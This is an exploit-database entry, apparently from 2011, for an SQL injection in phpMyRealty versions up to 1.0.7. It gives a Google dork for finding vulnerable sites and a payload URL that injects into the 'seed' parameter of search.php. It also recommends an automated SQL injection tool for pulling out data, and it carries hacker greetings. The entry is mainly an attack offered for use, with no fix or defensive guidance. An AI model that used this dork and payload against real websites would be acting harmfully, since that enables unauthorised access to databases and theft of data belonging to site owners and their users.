id: 16724
date: 08/19/2011
title: phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability
author: H4T$A
cves: 

|=========================================================================================|
# Exploit Title: [phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability]
# Google Dork: [intext:Sort By: Submission Date | Bedrooms | Bathrooms |
Price (ASC) | Price (DESC)]
# Date: [19-8-2011]
# Author: [H4T$A]
# Software Link: [http://www.phpmyrealty.com/]
# Version: [v. 1.0.7]
# Tested on: [all versions are Vulnerability]
# |Contact:newboy62@live.com
#Gr33tz f0r th3 >> best egyption hacker >>> H4T$A
||=========================================================================================
 
Exploit :
       http://www.website.com/search.php?seed=640'
 
you can use Haivj SQL injection tool the easiest way to work with the
exploit :)
 
remember you will change the link to >> ||search.php?seed=-640||before
start using Haivj :)
 
||=========================================================================================|



#  0day.today [2023-03-26]  #